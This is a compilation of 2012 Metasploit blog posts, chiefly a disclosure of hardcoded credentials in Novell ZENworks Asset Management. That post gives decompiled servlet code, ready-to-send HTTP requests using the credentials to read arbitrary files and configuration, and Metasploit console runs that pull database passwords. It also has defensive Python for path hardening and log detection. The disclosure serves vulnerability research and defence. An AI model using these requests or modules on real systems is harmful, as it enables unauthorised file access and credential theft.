
AppSecUSA 2012

Last week was AppSecUSA 2012 here in Austin, which may explain the curious absence of a weekly Metasploit Update blog post. The highlights of AppSec for me were (in no particular order): meeting Raphael @ArmitageHacker Mudge in person for the first time, and meeting Scott @_nullbind Sutherland, author of a bunch of recent Microsoft SQL post modules; both of them happened to contribute pretty significantly to last week's Metasploit update.

I also got to meet the guys behind Gauntlt, the modestly-described "security testing tool built on Cucumber." I'm really pretty excited about Gauntlt and am currently looking around for some time to really dig into the code base. Think of it as automated, continuous-integration-style pen-testing for already deployed application infrastructure (and that description is probably selling it pretty short). It's pretty neat, and this whole ruggedization thing is what made AppSecUSA one of the better conferences this year.

Oh yeah, the update

During AppSecUSA, we did manage to squeeze out an update to Metasploit. I know you all sit by your RSS feeds just waiting for notification, and while I did tweet the release notes, I did neglect to mention the update on the blog here. So, here you go, the micro-summary:

The update is centered around fixes for bugs reported by Raphael, some neato post modules by nullbind and mubix (the former wrote some post SQL modules, the latter, some core Windows config post modules), and we have one (count 'em, one) new exploit module for Turbo FTP Server. That exploit got some love from long-time contributors corelanc0d3r, thelightcosine, and Lincoln. Thanks guys!

New Modules

Here's the breakdown of the new modules with the links to Metasploit's Exploit Database.

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see the most excellent release notes.

ZENWorks' Accidental Backdoor

This week, we saw the release of Metasploit exploit developer Juan Vazquez's freshly discovered vulnerability in Novell ZENWorks. You can read all about it in Juan's great technical blog post, but the short version for the attention-deprived is: Novell ZENWorks ships with hard-coded credentials, which allow SYSTEM-level file system read access.

That seems like kind of a big deal for ZENWorks users -- namely because there's no reasonable way to change these credentials in the ZENWorks interface. I don't know about you, but that sounds like a backdoor to me.

Of course, we take reasonable disclosure pretty seriously here. We don't call it "responsible disclosure," since that's usually just code for "secretly inform vendors and wait on their schedule before warning users," nor is it "full disclosure," because we don't just drop 0day as soon as we find it. I think of what we do here at Rapid7 as a very reasonable middle ground. In this case, we notified the vendor, we shared with US-CERT, and now we're letting the users know, all on a predictable timetable.

For what it's worth, most vendors can ship a bugfix given a couple of months' notice. For whatever reason, we haven't seen a fix from Novell on this one yet, so if you're a customer, you might have better luck than us (and US-CERT) in getting a reasonable response. In the meantime, feel free to validate the backdoor yourself with Juan's spiffy Metasploit modules, linked below.

PHP EXE

In other exploit dev news, we're also shipping this week James "Egypt" Lee's PHP EXE payload. This library should help automate the generation of a hundred thousand more remote, arbitrary PHP code execution vulns in the universe of hastily-written PHP apps.

So, for ARCH_PHP targets, the PhpEXE payload simply returns the given encoded payload wrapped in <?php ?> markers.

For target architectures other than ARCH_PHP, it will base64-encode an appropriate executable and drop it on the target system. After running it, the generated code will attempt to unlink the dropped executable. Note that unlinking a running executable in this way nearly always fails on Windows, so you will certainly leave artifacts of exploitation behind there.

Kernelsmith Becomes Open Source Issue Manager

This week, long-time Metasploit contributor and #metasploit IRC troublemaker Kernelsmith stepped up and volunteered to serve as issue manager. Hooray! What this means is that we'll have someone around championing your bug reports and feature requests who is a) already capable with Metasploit, b) already active in the Metasploit community, and c) not beholden to a Rapid7 paycheck.

This last bit is important for the whole open source ethos we're pursuing with Metasploit. Kernelsmith cares about the free Metasploit Framework first and foremost, mainly because he uses it all the time. Because of this, he's a pretty ideal ombudsman-type figure to keep us honest and responsive to your bugs.

Of course, it's important to note that Kernelsmith isn't our community whipping boy. He has a life and a job and all that, and though he loves Metasploit at least as much as I do, he really is "just" volunteering to help clean up our issue tracking act. So, let's be nice and not pile all our drudgery on him at once.

So, if you have a bug that's been languishing on the pile over on our Redmine issue tracker, take heart -- Kernelsmith is, at this very moment, separating the wheat from the chaff. If you don't see progress on your pet bug in the immediate term, feel free to bump it via a Redmine comment. We have a bit of a backlog to work through, but with Kernelsmith's help and yours, we should be making real progress on responsive and responsible issue management in the coming weeks.

New Modules

Here's the breakdown with the links to Metasploit's Exploit Database.

Exploit modules

Auxiliary and Post modules

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see the most excellent release notes.

Does penetration testing seem like a good idea to you, but your managers don't seem to get it? Don't worry, you're not alone, and there is a solution. This Whiteboard Wednesday video walks you through some steps to achieve your goal - and to get your budget approved.

Areas I'll touch on are:

  • How do I explain penetration testing to my boss?
  • Why do we need penetration testing if we have all these security controls in place?
  • Should I be using the fear factor to sell security?
  • How do I build on penetration testing as a success factor?
  • How do I get buy-in for penetration testing?
  • How do I calculate the return on investment (ROI) for penetration testing?

Click on the video on your right to watch the video!

Prefer to read? Download this white paper on How to Justify Your Penetration Testing Budget.

Today, we present to you a flashy new vulnerability with a color-matching exploit straight from our super secret R&D safe house here in Metasploit Country. Known as CVE-2012-4933, it applies to Novell ZENworks Asset Management 7.5, which "integrates asset inventory, software usage, software management and contract management to provide the most complete software asset management tool available". Following our standard disclosure policy, we notified both Novell and CERT, and today CERT has published it. The new Metasploit exploit gives you access to files on the system using SYSTEM privileges and gets you all the way to the backend credentials in clear text. What else could you ask for on a crisp Monday morning in fall?

Vulnerability Summary

ZENworks Asset Management provides a Web Console, where the user can access the data collected about network devices and edit some information. This web interface provides some maintenance calls, two of them accessible with hardcoded credentials, allowing a remote attacker:

  • To retrieve any file from the remote file system with SYSTEM privileges.
  • To get configuration parameters from ZENworks Asset Management, including the backend credentials in clear text.

Disclosure Timeline

Date        Description
2012-08-09  Initial discovery by Juan Vazquez
2012-08-09  Metasploit module written
2012-08-15  Initial disclosure to Novell
2012-08-30  Disclosure to US-CERT
2012-10-15  Public disclosure and Metasploit module published

Technical Analysis

The Web Console of ZENworks Asset Management is provided through a Java Web Application. The Web Application (named "rtrlet") provides a Servlet named "Rtrlet". This servlet has a function named "HandleMaintenanceCalls" where the different maintenance actions are implemented. The function is reached every time a POST or GET request is handled by the "Rtrlet" servlet; the call flow up to HandleMaintenanceCalls() is: doGet() / doPost() => DoReport() => HandleMaintenanceCalls(). The flow is analyzed below:

  • From the doGet() function:

public void doGet(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
    throws ServletException, IOException
{
    if(!ServletStatuses.UpdaterReady())
    {
        DoNotReadyResponse(httpservletrequest, httpservletresponse);
        return;
    } else
    {
        ReportParams reportparams = new ReportParams(RequestNumber++);
        cat.debug("ECNC1: " + rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
        httpservletrequest.setCharacterEncoding(rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
        LoadRP(reportparams, httpservletrequest); // Request parameters (query string) are loaded into reportparams
        DoReport(httpservletrequest, httpservletresponse, reportparams); // Call to DoReport()
        return;
    }
}

  • From the doPost() function:

public void doPost(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse)
    throws ServletException, IOException
{
    if(!ServletStatuses.UpdaterReady())
    {
        DoNotReadyResponse(httpservletrequest, httpservletresponse);
        return;
    }
    ReportParams reportparams = new ReportParams(RequestNumber++);
    String s = httpservletrequest.getContentType();
    if(s.startsWith("multipart/form-data"))
    {
        try
        {
            cat.debug("Content type is " + s);
            String s1 = CWD + IMPORT_FOLDER;
            cat.info("Import scripts directory has been set to : " + s1);
            String s2 = s1 + File.separator;
            cat.debug("doPost(): uploadDest=" + s2);
            File file = new File(s2);
            if(!file.exists())
                file.mkdirs();
            String s3 = "";
            MalibuMultipartRequestParser malibumultipartrequestparser = new MalibuMultipartRequestParser(httpservletrequest, s2, "", s3);
            malibumultipartrequestparser.parseRequest();
            HashMap hashmap = malibumultipartrequestparser.getWebVars();
            LoadRP(reportparams, hashmap);
        }
        catch(Exception exception)
        {
            cat.debug("Unhandled exception reading multipart data in rtrlet", exception);
        }
    } else
    {
        cat.debug("ECNC2: " + rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
        httpservletrequest.setCharacterEncoding(rss.GetParamWithDefault("CharacterEncoding", ToolBox.DEFAULT_ENCODING));
        LoadRP(reportparams, httpservletrequest); // Form-encoded POST parameters are loaded into reportparams
    }
    DoReport(httpservletrequest, httpservletresponse, reportparams); // Call to DoReport()
}

Once inside the DoReport() function, the first thing it does is call HandleMaintenanceCalls():

private void DoReport(HttpServletRequest httpservletrequest, HttpServletResponse httpservletresponse, ReportParams reportparams)
    throws IOException
{
    if(HandleMaintenanceCalls(httpservletresponse, reportparams)) // Call to HandleMaintenanceCalls
        return;

The HandleMaintenanceCalls() function manages the maintenance calls. The call is selected by a request parameter named "maintenance" (the bodies of the individual branches are omitted below):

private boolean HandleMaintenanceCalls(HttpServletResponse httpservletresponse, ReportParams reportparams)
    throws IOException
{
    if(reportparams.GetParam("maintenance").equals(""))
        return false;
    if(httpservletresponse == null)
        return false;
    cat.info("Maintenance request");
    if(reportparams.GetParam("maintenance").equals("resetsession")) // Checks if maintenance == "resetsession"
    {
    }
    if(reportparams.GetParam("maintenance").equals("XSLTOff")) // Checks if maintenance == "XSLTOff"
    {
    }
    if(reportparams.GetParam("maintenance").equals("XSLTOn")) // Checks if maintenance == "XSLTOn"
    {
    }
    if(reportparams.GetParam("maintenance").equals("ShowLogins")) // Checks if maintenance == "ShowLogins"
    {
    }
    if(reportparams.GetParam("maintenance").equalsIgnoreCase("help")) // Checks if maintenance == "help"
    {
    }
    // Checks if maintenance == "GetFile" or maintenance == "GetConfigInfo"
    if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetFile") || reportparams.GetParam("maintenance").equalsIgnoreCase("GetConfigInfo"))
    {
    }
    if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetFile_Password")) // Checks if maintenance == "GetFile_Password"
    {
    }
    if(reportparams.GetParam("maintenance").equalsIgnoreCase("GetConfigInfo_Password")) // Checks if maintenance == "GetConfigInfo_Password"
    {
    } else
    {
        return false;
    }
}

From the snippet above, the following maintenance calls can be identified: "resetsession", "XSLTOff", "XSLTOn", "ShowLogins", "help", "GetFile", "GetConfigInfo", "GetFile_Password" and "GetConfigInfo_Password". Two of them are protected by hardcoded credentials: "GetFile_Password" and "GetConfigInfo_Password". Note that the comparison is done with equalsIgnoreCase(), so the call names and the credentials are matched case-insensitively.

  • GetFile_Password

// Checks if username == "Ivanhoe" and password == "Scott"
if(!reportparams.GetParam("username").equalsIgnoreCase("Ivanhoe") || !reportparams.GetParam("password").equalsIgnoreCase("Scott"))
{
    printwriter3.println("Sorry</html>");
    printwriter3.close();
    return true;
}

  • GetConfigInfo_Password

// Checks if username == "Ivanhoe" and password == "Scott"
if(!reportparams.GetParam("username").equalsIgnoreCase("Ivanhoe") || !reportparams.GetParam("password").equalsIgnoreCase("Scott"))
{
    printwriter4.println("Sorry</html>");
    printwriter4.close();
    return true;
}

In both cases the functions are protected by the credentials Ivanhoe / Scott, and allow an attacker to:

  • (1) Access any file in the file system, in the case of "GetFile_Password":

// absolute=yes: the "file" parameter is used as the path verbatim
if(reportparams.GetParam("absolute").equalsIgnoreCase("yes"))
{
    s = reportparams.GetParam("file");
} else
{
    // otherwise the name is appended to tomcat.home (or catalina.home) with no traversal check
    Properties properties = new Properties(System.getProperties());
    String s2 = properties.getProperty("tomcat.home");
    if(s2 == null)
        s2 = properties.getProperty("catalina.home");
    if(s2 == null)
        s2 = "";
    s = s2 + "/" + reportparams.GetParam("file");
}
printwriter3.println("<br/>File name = " + s + "<br/><br/><br/>");
try
{
    File file = new File(s);
    FileInputStream fileinputstream = new FileInputStream(file);
    int j1 = fileinputstream.available();
    // "kb" selects how much of the tail of the file is returned; a large value returns the whole file
    Integer integer = new Integer(reportparams.GetParam("kb"));
    int l1 = j1 - integer.intValue() * 1000;
    if(l1 > 0)
        fileinputstream.skip(l1);
    printwriter3.println("<pre>");
    int i2;
    while((i2 = fileinputstream.read()) != -1)
        printwriter3.write(i2);
    printwriter3.println("</pre>");
    fileinputstream.close();
}

  • (2) Access the ZENworks Asset Management 7.5 configuration parameters, including the backend credentials in clear text, in the case of "GetConfigInfo_Password".
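The file-access branch is worth modelling on its own. The following Python is an added illustration, not Novell's code and not Metasploit's: it mirrors the decompiled path handling (absolute=yes takes the "file" parameter verbatim, otherwise the name is appended to tomcat.home with no traversal check) and the "kb" tail-window arithmetic, beside a hardened resolver that ignores the absolute flag, canonicalises the name and refuses anything outside a fixed directory. The tomcat.home value and the allowed subdirectory are constructed assumptions, and the model uses POSIX path rules for brevity even though the product runs on Windows.

```python
import posixpath

TOMCAT_HOME = "/opt/tomcat"  # constructed stand-in for the tomcat.home system property


def resolve_as_shipped(params, tomcat_home=TOMCAT_HOME):
    """Model of the decompiled GetFile_Password path logic (not the original
    source): absolute=yes returns the 'file' parameter untouched; anything
    else is glued onto tomcat.home with a '/', with no traversal check."""
    if params.get("absolute", "").lower() == "yes":
        return params.get("file", "")
    return tomcat_home + "/" + params.get("file", "")


def tail_window_offset(file_size, kb):
    """Model of the kb arithmetic: the servlet skips size - kb*1000 bytes when
    that is positive, so a huge kb (as in the request above) yields offset 0
    and the whole file is returned."""
    offset = file_size - int(kb) * 1000
    return offset if offset > 0 else 0


def resolve_hardened(params, tomcat_home=TOMCAT_HOME, allowed_subdir="logs"):
    """Hardened counterpart (hypothetical, added here): ignore the 'absolute'
    flag, accept only relative names, canonicalise, and require the result to
    stay inside tomcat_home/allowed_subdir. Returns None for rejected input."""
    base = posixpath.normpath(posixpath.join(tomcat_home, allowed_subdir))
    requested = params.get("file", "")
    # Reject empty names, absolute paths, backslashes and drive colons before
    # doing any path arithmetic at all.
    if (not requested or requested.startswith("/")
            or "\\" in requested or ":" in requested):
        return None
    candidate = posixpath.normpath(posixpath.join(base, requested))
    # normpath has already collapsed every "..", so a prefix check is sound.
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed parameters mirroring the request shown later in the post.
    sample = {"kb": "100000000", "file": "c:\\boot.ini", "absolute": "yes"}
    print("as shipped :", resolve_as_shipped(sample))
    print("tail offset:", tail_window_offset(341, sample["kb"]))
    print("hardened   :", resolve_hardened(sample))
    print("hardened   :", resolve_hardened({"file": "catalina.out"}))
```

The traversal case (absolute=no with "../" in the name) is the same weakness the Metasploit module's DEPTH option exercises; the hardened resolver closes both that and the absolute-path case, and the kb helper shows why the request uses such a large value.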


Exploitation

After examining the "GetFile_Password" and "GetConfigInfo_Password" calls, the requests that reach both functions can be built. The requests and the information retrieved are presented below.

  • GetFile_Password: The following request invokes the "GetFile_Password" maintenance call to retrieve the "c:\boot.ini" configuration file from a Windows installation:

POST /rtrlet/rtr HTTP/1.1
Host: 192.168.1.147:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

kb=100000000&file=c:\boot.ini&absolute=yes&maintenance=GetFile_password&username=Ivanhoe&password=Scott&send=Submit

The response to the request contains the file contents:

HTTP/1.1 200 OK
Content-Length: 341
Date: Sun, 12 Aug 2012 11:28:10 GMT
Server: Apache-Coyote/1.1

<html>
<b>Last 100000000 kilobytes of c:\boot.ini</b><br/>
<br/>File name = c:\boot.ini<br/><br/><br/>
<pre>
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
</pre>
</html>

  • GetConfigInfo_Password: The following request invokes the "GetConfigInfo_Password" maintenance call and retrieves the ZENworks Asset Management configuration:

POST /rtrlet/rtr HTTP/1.1
Host: 192.168.1.147:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: application/x-www-form-urlencoded
Content-Length: 98

kb=&file=&absolute=&maintenance=GetConfigInfo_password&username=Ivanhoe&password=Scott&send=Submit

The response contains the ZENworks Asset Management configuration parameters, including the database credentials in clear text (the original post shows them in a screenshot of the response).
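On the detection side, both calls are selected by a plain request parameter, and the servlet reads parameters from GET query strings as well as from POST bodies (doGet() and doPost() both feed LoadRP()). The following Python is an added example, not part of the original post and not Metasploit code: it scans constructed Tomcat-style access log lines for requests to /rtrlet/rtr that name either credential-gated maintenance call, and flags POSTs to the servlet for body inspection, since an access log does not record form bodies. The hosts, timestamps and the log format regex are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Call names taken from the decompiled HandleMaintenanceCalls(). The servlet
# compares them with equalsIgnoreCase, so we match case-insensitively too.
SENSITIVE_CALLS = {"getfile_password", "getconfiginfo_password"}
SERVLET_PATH = "/rtrlet/rtr"

# Common Log Format as written by Tomcat's AccessLogValve (assumed layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log: one benign call, one GET hit, one POST, one
# unrelated request and one upper-case spelling of the config call.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2012:09:12:01 +0000] "GET /rtrlet/rtr?maintenance=help HTTP/1.1" 200 512
10.0.0.9 - - [15/Oct/2012:09:12:07 +0000] "GET /rtrlet/rtr?kb=100000000&file=c:\\boot.ini&absolute=yes&maintenance=GetFile_password&username=Ivanhoe&password=Scott HTTP/1.1" 200 341
10.0.0.9 - - [15/Oct/2012:09:12:09 +0000] "POST /rtrlet/rtr HTTP/1.1" 200 4096
10.0.0.5 - - [15/Oct/2012:09:13:00 +0000] "GET /images/logo.gif HTTP/1.1" 200 1203
10.0.0.9 - - [15/Oct/2012:09:13:30 +0000] "GET /rtrlet/rtr?maintenance=GETCONFIGINFO_PASSWORD&username=ivanhoe&password=scott HTTP/1.1" 200 4096
"""


def classify(entry):
    """Return (severity, reason) for one parsed entry, or None if benign."""
    parts = urlsplit(entry["target"])
    if parts.path != SERVLET_PATH:
        return None
    # Lower-case both keys and values so the comparison mirrors the servlet.
    query = {k.lower(): [v.lower() for v in vals]
             for k, vals in parse_qs(parts.query).items()}
    hits = set(query.get("maintenance", [])) & SENSITIVE_CALLS
    if hits:
        return ("high", "credential-gated maintenance call in query string: "
                + ",".join(sorted(hits)))
    if entry["method"] == "POST":
        return ("review", "POST to maintenance servlet; parameters are not in "
                "the access log, inspect the body at the proxy or WAF")
    return None


def scan(log_text):
    """Parse each line, classify it and return the findings in log order as
    (ip, timestamp, method, severity, reason) tuples."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        entry = m.groupdict()
        verdict = classify(entry)
        if verdict:
            findings.append((entry["ip"], entry["ts"], entry["method"], *verdict))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep=" | ")
```

Case-insensitive matching matters here: a rule that only looks for the literal "GetFile_Password" would miss the lower-case spelling used in the request above, which the servlet accepts just the same.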


In order to allow Metasploit users to test their Novell ZENworks Asset Management installations, two auxiliary modules have been added:

  • (1) To retrieve arbitrary files with SYSTEM privileges through the GetFile maintenance task

msf > use auxiliary/scanner/http/zenworks_assetmanagement_fileaccess 
msf  auxiliary(zenworks_assetmanagement_fileaccess) > set RHOSTS 192.168.1.131
RHOSTS => 192.168.1.131
msf  auxiliary(zenworks_assetmanagement_fileaccess) > show options

Module options (auxiliary/scanner/http/zenworks_assetmanagement_fileaccess):

   Name      Current Setting                        Required  Description
   ----      ---------------                        --------  -----------
   ABSOLUTE  true                                   yes       Use an absolute file path or directory traversal relative to the tomcat home
   DEPTH     1                                      no        Traversal depth if absolute is set to false
   FILEPATH  C:\WINDOWS\system32\drivers\etc\hosts  yes       The name of the file to download
   Proxies                                          no        Use a proxy chain
   RHOSTS    192.168.1.131                          yes       The target address range or CIDR identifier
   RPORT     8080                                   yes       The target port
   THREADS   1                                      yes       The number of concurrent threads
   VHOST                                            no        HTTP server virtual host

msf  auxiliary(zenworks_assetmanagement_fileaccess) > run

[*] 192.168.1.131:8080 - Sending request...
[*] 192.168.1.131:8080 - File retrieved successfully!
[*] 192.168.1.131:8080 - File saved in: /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(zenworks_assetmanagement_fileaccess) > cat /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin
[*] exec: cat /Users/juan/.msf4/loot/20121001202022_default_192.168.1.131_novell.zenworks__064183.bin

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost


  • (2) To retrieve the configuration of Novell ZENworks Asset Management through the GetConfigInfo maintenance task

msf > use auxiliary/scanner/http/zenworks_assetmanagement_getconfig 
msf  auxiliary(zenworks_assetmanagement_getconfig) > set RHOSTS 192.168.1.131
RHOSTS => 192.168.1.131
msf  auxiliary(zenworks_assetmanagement_getconfig) > show options

Module options (auxiliary/scanner/http/zenworks_assetmanagement_getconfig):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        Use a proxy chain
   RHOSTS   192.168.1.131    yes       The target address range or CIDR identifier
   RPORT    8080             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   VHOST                     no        HTTP server virtual host

msf  auxiliary(zenworks_assetmanagement_getconfig) > run

[*] 192.168.1.131:8080 - Sending request...
[*] 192.168.1.131:8080 - File retrieved successfully!
[*] 192.168.1.131:8080 - File saved in: /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__811678.bin
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed


The configuration will include the database credentials:

$ grep "^DBUser" -A5 /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__811678.bin
DBUser
</td>
<td>
NCSystem
</td>
</tr>
$ grep "^DBPassword" -A5 /Users/juan/.msf4/loot/20121001201257_default_192.168.1.131_novell.zenworks__811678.bin
DBPassword
</td>
<td>
tally
</td>
</tr>

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions.

Introducing RopDB

This week, Metasploit exploit devs Wei "sinn3r" Chen and Juan Vazquez finished up Metasploit RopDB. This advancement allows for drop-in ROP chains in new exploits, without all that mucking around with copying and pasting mysterious binary blobs from one exploit to the next. For the details on how to use it and what to expect in the API, see sinn3r's most excellent blog post. What all this does is bottle up ROP wisdom in a central repository, so chains can be added and modified easily without having to touch the dozens of modules that might rely on them, and generally makes exploit development -- especially browser exploit development -- that much quicker and less painful. Thanks guys!


Refreshed Sample Modules

Speaking of copy-pasting code: when people ask about writing Metasploit modules, the advice most often given is to look around the modules tree for one that does roughly what you want, then copy and paste it into your new module and go from there. Sadly, though, that advice means new modules will sometimes carry code that's been cargo-culted in for no apparent reason.

This week, Metasploit core developer James "Egypt" Lee refreshed our aging sample modules hidden deep (well, two levels) within the documentation subdirectory -- if you want to know the bare minimum (and bare correctness) for sample module format, that is a fine place to look. Incidentally, the gentleman hackers over at Corelan Team provide mona.py, a Python script that can help you pump out new Metasploit modules as well. Mona.py is quite versatile and goes farther than our own samples do, in that it can create some specialized file-format-style exploit modules as well.


Local Privilege Escalation Exploit Modules

This week also sees some new additions to the local privilege escalation landscape, using the new local exploitation techniques. Rob "mubix" Fuller converted the venerable Windows Escalate UAC Protection Bypass (by David "ReL1k" Kennedy, mubix, and mitnick) from the older post module into a local exploit, and added a new UAC Execute RunAs exploit, also by mubix. In addition, Matteo Memelli and Spencer McIntyre committed MS11-080 AfdJoinLeaf Privilege Escalation, which elevates the user to a SYSTEM context.

Local exploits have been available for a little while now in Metasploit Framework, and their use is catching on. The distinction from a post-exploitation module is subtle, but important. If you want to perform some task through a session you already have, then you probably want a Post module. For example, the recent GPG key enumeration module from community contributor Dhiru Kholia leaps to mind: you're doing useful things, but you're not running any shellcode on the target.

On the other hand, if you want to run a configurable payload, then you definitely want a local exploit like the ones mentioned above. I expect most of the "escalate" post modules are better suited as local exploit modules, now that the capability has been cooking for a while. So, if you have a favorite in there, now is a fine time to convert it.


Coming Soon: Mobile Vulnerabilities

As you no doubt heard, the guys over at Mobilisafe joined the Rapid7 family (syndicate? No, let's go with "family") this week. This means we all get to get smarter about exploring and exploiting mobile vulnerabilities. We already have payloads for ARM platforms, and Mobilisafe maintains a pretty sweet list of vulnerable devices, so it should be just connecting the dots to get some Metasploit module love all up in your Android or iOS gadget, right?

Well, it's a teensy bit more complicated than that, of course. We're building out a mobile device lab here in the labyrinthine Metasploit Software and Pizza Delivery Headquarters, where we can tackle some of the persistence problems that we tend to run into when exploiting mobile vulnerabilities. In the meantime, if you have ideas for some nice mobile Metasploit exploits, get thee to our Pull Request queue; we'd love to see what you're up to.


New Modules

Here's the list of new modules this week. For info on usage, just follow the links to Metasploit's Exploit Database.

Exploit modules

Auxiliary and post modules

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see the most excellent release notes.

Each month we report the top ten searched exploit and auxiliary modules on metasploit.com. The statistics are drawn from our exploit database by analyzing webserver logs of searches, not from Metasploit usage, which is not tracked in order to preserve privacy.

With the Java and Internet Explorer 0-days in August and September, this month's exploit trends from Metasploit really shook up the status quo. And, just to make things more interesting, a couple of exploits from April came back for an encore at numbers 9 & 10.

Without further ado, here are September's Top Ten Exploits with commentary from Metasploit guru todb.


1. Java Atomic Reference Array Type Violation Vulnerability (CVE-2012-0507): A returning entry from the April Top 10, this module makes its comeback because of all the Java 0day traffic from August. This was initially discovered in the wild as a Java 0-day, and this module represented the fevered work of sinn3r and Juan Vazquez, who turned out the first reliable public cross-platform exploit for the bug. The blog post "CVE-2012-0507 - Java Strikes Again" shows a screenshot of Meterpreter sessions on Windows, Ubuntu, and OSX systems. In fact, this may be the first publicly demonstrable Java exploit that just works against all three platforms for the vulnerable versions of Java -- no extra configuration or fingerprinting is needed. Returning entry from the April Top 10 Exploits.

2. Java 7 Applet Remote Code Execution: Over a fateful weekend in August, Metasploit exploit devs Wei "sinn3r" Chen, Juan Vazquez, and contributor Josh "jduck" Drake got together on IRC and put together a Metasploit module to take advantage of the vulnerability reported privately to Oracle by Adam Gowdiak and James Forshaw. Here's the twist: nobody at the time knew about Adam's or James's private disclosure to Oracle -- this bug was instead spotted in the wild way before Oracle was planning to release their fix. So, we started the week with a new Java 0-day, and by the end of the week, after much speculation, Oracle did the right thing and accelerated their patch schedule. Interesting times, to say the least. Down one place from #1 last month.

3. MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability: This bug started off with Eric Romang's blog post and ended up with a module being cooked up over a weekend by Eric, @binjo, and the Metasploit exploit dev team. This event, like the Java 0-day, had the net effect of speeding up the vendor's patch schedule. If there was no public, open exploit, would there have been a patch so rapidly? Was it connected with the Java 0-day? Who's the primary source for these critical client-side bugs, anyway? These and other questions are still being speculated on and debated in the security industry and security press. New entry this month.


4. Microsoft Server Service Relative Path Stack Corruption (CVE-2008-4250, MSB-MS08-067): A four year old vulnerability that tends to give the most reliable shells on Windows 2003 Server and Windows XP. It’s also got a great pile of language pack targets. All of Metasploit’s exploits provide US English targeted shellcode, a few might provide Chinese, Spanish, French, or other popular languages; this one has targets in pretty much every language you've ever heard of. This exploit is also not ancient, so it’s reasonable to expect to find some unpatched systems in a medium to large enterprise vulnerable to it. More on this topic at Microsoft’s Security TechCenter. Down two places from #2 since last month.

5. MS12-020 Microsoft Remote Desktop Use-After-Free DoS (CVE-2012-0002, MSB-MS12-020): This is the 2012 RDP Bug, where it was implied -- but never proven in public -- that a pre-auth bug in RDP can allow for remote code execution. This is likely the most popular module we have due to both recency bias and because there was an unusual level of spontaneous organization of the Metasploit developer community to search for the correct path to remote code execution. So far, nobody’s gotten RCE yet (in public), but the Metasploit module provides the most clues. More on this topic in an article on ZD Net. Down two places from #3 since last month.

6. Microsoft RPC DCOM Interface Overflow (CVE-2003-0352, MSB-MS03-026): A nine year old vulnerability that used to be the de-facto standard exploit for Windows machines - this is the RPC DCom bug, and it affects ancient NT machines. It was most notable in that it was used by the Blaster and Nachi worms to transit networks. It’s now pretty much a case study in stack buffer overflows in Windows, so it’s got a lot of historical value. If memory serves, this was the most reliable exploit in Metasploit v2. More info on that at Windows IT Pro. Down two places from #4 since last month.

7. Microsoft Server Service NetpwPathCanonicalize Overflow (CVE-2006-3439, MSB-MS06-040): A six year old vulnerability that's notable in that there's no official patch from Microsoft for this on Windows NT 4.0. This was discovered after NT went end-of-life, so if you need remote root on an NT machine (and there are still plenty out there), this is going to be your first choice. More on this topic at Microsoft's Security TechCenter. Down two places from #5 since last month.

